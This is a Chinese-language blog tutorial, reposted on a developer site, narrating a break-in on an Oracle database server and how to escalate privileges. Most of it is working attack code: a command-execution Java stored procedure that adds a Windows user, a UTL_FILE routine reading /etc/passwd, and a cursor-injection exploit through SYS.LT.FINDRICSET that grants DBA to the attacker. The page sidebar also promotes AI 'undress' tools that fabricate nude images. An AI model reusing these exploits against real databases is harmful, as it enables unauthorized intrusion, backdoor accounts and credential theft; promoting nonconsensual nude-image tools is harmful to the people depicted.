入侵Oracle服务器进一步获取权限-mysql チュートリアル-php.cn

ホームページ

データベース

mysql チュートリアル

入侵Oracle服务器进一步获取权限

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB

Jun 07, 2016 pm 04:56 PM

oracle データベース

很快便连接上Oracle服务器，此时发现： 1.连接后不是dba权限 2.不能利用SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_

　　很快便连接上Oracle服务器，此时发现：

　　1.连接后不是dba权限

　　2.不能利用SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES漏洞提升权限

　　3.运行SELECT UTL_HTTP.request(‘’) FROM dual 后发现oracle服务器不能连接网络。

　　幸运的是，

　　运行

　　create or replace function Linx_Query (p varchar2) return number authid current_user is begin execute immediate p; return 1;end;

　　成功!这个用户具有create proceduce权限。

　　此时马上想到创建java扩展执行命令：

　　create or replace and compile java source named “LinxUtil” as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str=”";while ((stemp = myReader.readLine()) != null) str +=stemp+” “;myReader.close();return str;} catch (Exception e){return e.toString();}}}

　　begin dbms_java.grant_permission(‘PUBLIC’, ‘SYS:java.io.FilePermission’, ‘’, ‘execute’ );end;

　　create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ‘LinxUtil.runCMD(java.lang.String) return String’

　　select * from all_objects where object_name like ‘%LINX%’

　　grant all on LinxRunCMD to public

　　select LinxRunCMD(‘cmd /c net user linx /add’) from dual

　　但是在第一步就卡住了，服务器由于某种未知原因不能创建java扩展!!

　　还好，我们还有UTL库可以利用：

　　create or replace function LinxUTLReadfile (filename varchar2) return varchar2 is

　　fHandler UTL_FILE.FILE_TYPE;

　　buf varchar2(4000);

　　output varchar2(8000);

　　BEGIN

　　fHandler := UTL_FILE.FOPEN(‘UTL_FILE_DIR’, filename, ‘r’);

　　loop

　　begin

　　utl_file.get_line(fHandler,buf);

　　DBMS_OUTPUT.PUT_LINE(‘Cursor: ‘||buf);

　　exception

　　when no_data_found then exit;

　　end;

　　output := output||buf||chr(10);

　　end loop;

　　UTL_FILE.FCLOSE(fHandler);

　　return output;

　　END;

　　UTL_FILE_DIR需要先用：

　　CREATE OR REPLACE DIRECTORY UTL_FILE_DIR AS ‘/etc’;

　　指定目。但运行后发现没有权限。只好想办法提权。

　　***************游标注射***************

　　老外写了N个pdf介绍这技术，，我精简了代码：

　　DECLARE

　　MYC NUMBER;

　　BEGIN

　　MYC := DBMS_SQL.OPEN_CURSOR;

　　DBMS_SQL.PARSE(MYC,’declare pragma autonomous_transaction; begin execute immediate ”GRANT DBA TO linxlinx_current_db_user”;commit;end;’,0);

　　DBMS_OUTPUT.PUT_LINE(‘Cursor: ‘||MYC);

　　BEGIN SYS.LT.FINDRICSET(‘.”||dbms_sql.execute( ‘||MYC||’ )||””)–’,'x’); END;

　　raise NO_DATA_FOUND;

　　EXCEPTION

　　WHEN NO_DATA_FOUND THEN DBMS_OUTPUT.PUT_LINE(‘Cursor: ‘||MYC);

　　WHEN OTHERS THEN DBMS_OUTPUT.PUT_LINE(‘Cursor: ‘||MYC);

　　END;

　　运行后重新连接就有dba权限了，简单吧……

　　现在可以读取文件了：

　　CREATE OR REPLACE DIRECTORY UTL_FILE_DIR AS ‘/etc’;

　　select LinxUTLReadfile(‘passwd’) from dual

　　后面就简单了，不写了。

linux

このウェブサイトの声明

この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。

ホットAIツール

Undresser.AI Undress

リアルなヌード写真を作成する AI 搭載アプリ

AI Clothes Remover

写真から衣服を削除するオンライン AI ツール。

Undress AI Tool

脱衣画像を無料で

Clothoff.io

AI衣類リムーバー

Video Face Swap

完全無料の AI 顔交換ツールを使用して、あらゆるビデオの顔を簡単に交換できます。

ホットツール

メモ帳++7.3.1

使いやすく無料のコードエディター

SublimeText3 中国語版

中国語版、とても使いやすい

ゼンドスタジオ 13.0.1

強力な PHP 統合開発環境

ドリームウィーバー CS6

ビジュアル Web 開発ツール

SublimeText3 Mac版

神レベルのコード編集ソフト（SublimeText3）

ホットトピック

Java チュートリアル

1663

CakePHP チュートリアル

1420

Laravel チュートリアル

1313

PHP チュートリアル

1266

C# チュートリアル

1238

Related knowledge

MySQL：世界で最も人気のあるデータベースの紹介 Apr 12, 2025 am 12:18 AM

MySQLはオープンソースのリレーショナルデータベース管理システムであり、主にデータを迅速かつ確実に保存および取得するために使用されます。その実用的な原則には、クライアントリクエスト、クエリ解像度、クエリの実行、返品結果が含まれます。使用法の例には、テーブルの作成、データの挿入とクエリ、および参加操作などの高度な機能が含まれます。一般的なエラーには、SQL構文、データ型、およびアクセス許可、および最適化の提案には、インデックスの使用、最適化されたクエリ、およびテーブルの分割が含まれます。

なぜMySQLを使用するのですか？利点と利点 Apr 12, 2025 am 12:17 AM

MySQLは、そのパフォーマンス、信頼性、使いやすさ、コミュニティサポートに選択されています。 1.MYSQLは、複数のデータ型と高度なクエリ操作をサポートし、効率的なデータストレージおよび検索機能を提供します。 2.クライアントサーバーアーキテクチャと複数のストレージエンジンを採用して、トランザクションとクエリの最適化をサポートします。 3.使いやすく、さまざまなオペレーティングシステムとプログラミング言語をサポートしています。 4.強力なコミュニティサポートを提供し、豊富なリソースとソリューションを提供します。

Oracle Loopでカーソルを作成する方法 Apr 12, 2025 am 06:18 AM

Oracleでは、forループループは動的にカーソルを作成できます。手順は次のとおりです。1。カーソルタイプを定義します。 2。ループを作成します。 3.カーソルを動的に作成します。 4。カーソルを実行します。 5。カーソルを閉じます。例：カーソルをサイクルごとに作成して、上位10人の従業員の名前と給与を表示できます。

Oracleログがいっぱいの場合はどうすればよいですか Apr 12, 2025 am 06:09 AM

Oracleログファイルがいっぱいになると、次のソリューションを採用できます。1）古いログファイルをクリーンします。 2）ログファイルサイズを増やします。 3）ログファイルグループを増やします。 4）自動ログ管理をセットアップします。 5）データベースを再発射化します。ソリューションを実装する前に、データの損失を防ぐためにデータベースをバックアップすることをお勧めします。

HDFSでCentosを構成するために必要な手順 Apr 14, 2025 pm 06:42 PM

CENTOSシステムにHadoop分散ファイルシステム（HDFS）を構築するには、複数のステップが必要です。この記事では、簡単な構成ガイドを提供します。 1.初期段階でJDKをインストールする準備：すべてのノードにJavadevelopmentKit（JDK）をインストールすると、バージョンはHadoopと互換性がある必要があります。インストールパッケージは、Oracleの公式Webサイトからダウンロードできます。環境変数構成： /etc /プロファイルファイルを編集し、JavaおよびHadoop環境変数を設定して、システムがJDKとHadoopのインストールパスを見つけることができるようにします。 2。セキュリティ構成：SSHパスワードなしログインSSHキーを生成する：各ノードでSSH-KeyGenコマンドを使用する

ビジネスの世界におけるオラクルの役割 Apr 23, 2025 am 12:01 AM

Oracleはデータベース会社だけでなく、クラウドコンピューティングとERPシステムのリーダーでもあります。 1。Oracleは、データベースからクラウドサービスおよびERPシステムへの包括的なソリューションを提供します。 2。Oraclecloudは、AWSとAzureに挑戦し、IAAS、PAAS、SAASサービスを提供します。 3. e-businesssuiteやfusionApplicationsなどのOracleのERPシステムは、企業がオペレーションを最適化するのに役立ちます。

MySQL対その他のデータベース：オプションの比較 Apr 15, 2025 am 12:08 AM

MySQLは、Webアプリケーションやコンテンツ管理システムに適しており、オープンソース、高性能、使いやすさに人気があります。 1）PostgreSQLと比較して、MySQLは簡単なクエリと高い同時読み取り操作でパフォーマンスが向上します。 2）Oracleと比較して、MySQLは、オープンソースと低コストのため、中小企業の間でより一般的です。 3）Microsoft SQL Serverと比較して、MySQLはクロスプラットフォームアプリケーションにより適しています。 4）MongoDBとは異なり、MySQLは構造化されたデータおよびトランザクション処理により適しています。